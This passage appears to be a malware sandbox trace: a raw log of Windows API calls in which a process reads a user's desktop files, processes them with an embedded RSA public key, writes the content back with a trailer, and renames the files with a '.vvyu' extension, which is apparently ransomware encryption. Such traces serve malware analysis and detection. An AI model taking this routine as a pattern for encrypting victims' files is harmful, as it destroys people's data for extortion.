RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fa50 | out: hHeap=0x620000) returned 1 [0200.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.558] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xd6bb, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xd6bb, lpOverlapped=0x0) returned 1 [0200.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.559] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xd6c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.560] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.561] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.562] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.562] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.562] CloseHandle (hObject=0x510) returned 1 [0200.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x2ca5e50 [0200.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0200.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0200.564] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GHPRnGA3a e4cbOQmL8U.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\ghprnga3a e4cboqml8u.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GHPRnGA3a e4cbOQmL8U.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\ghprnga3a e4cboqml8u.bmp.vvyu")) returned 1 [0200.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.576] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.579] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x289dc630, ftCreationTime.dwHighDateTime=0x1d899f7, ftLastAccessTime.dwLowDateTime=0x75679170, ftLastAccessTime.dwHighDateTime=0x1d8a04c, ftLastWriteTime.dwLowDateTime=0x75679170, ftLastWriteTime.dwHighDateTime=0x1d8a04c, nFileSizeHigh=0x0, nFileSizeLow=0x115bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GW5kXQqybZPUP2d4.mp4", cAlternateFileName="GW5KXQ~1.MP4")) returned 1 [0200.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.579] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GW5kXQqybZPUP2d4.mp4") returned=".mp4" [0200.579] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GW5kXQqybZPUP2d4.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\gw5kxqqybzpup2d4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.582] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=71099) returned 1 [0200.582] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.585] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x11595, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.585] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.586] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.586] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x115bb, lpOverlapped=0x0) returned 1 [0200.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.588] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.589] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.589] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.589] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.589] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.589] GetLastError () returned 0x0 [0200.590] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.590] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.590] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.590] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.590] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x115c0) returned 0x2ea99b0 [0200.591] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fa50 [0200.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fa98 [0200.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.618] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0200.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3380 [0200.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3368 [0200.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0200.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0200.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.708] GetCurrentThreadId () returned 0x66c [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea81a8 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.721] GetCurrentThreadId () returned 0x66c [0200.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3380 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33e0 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 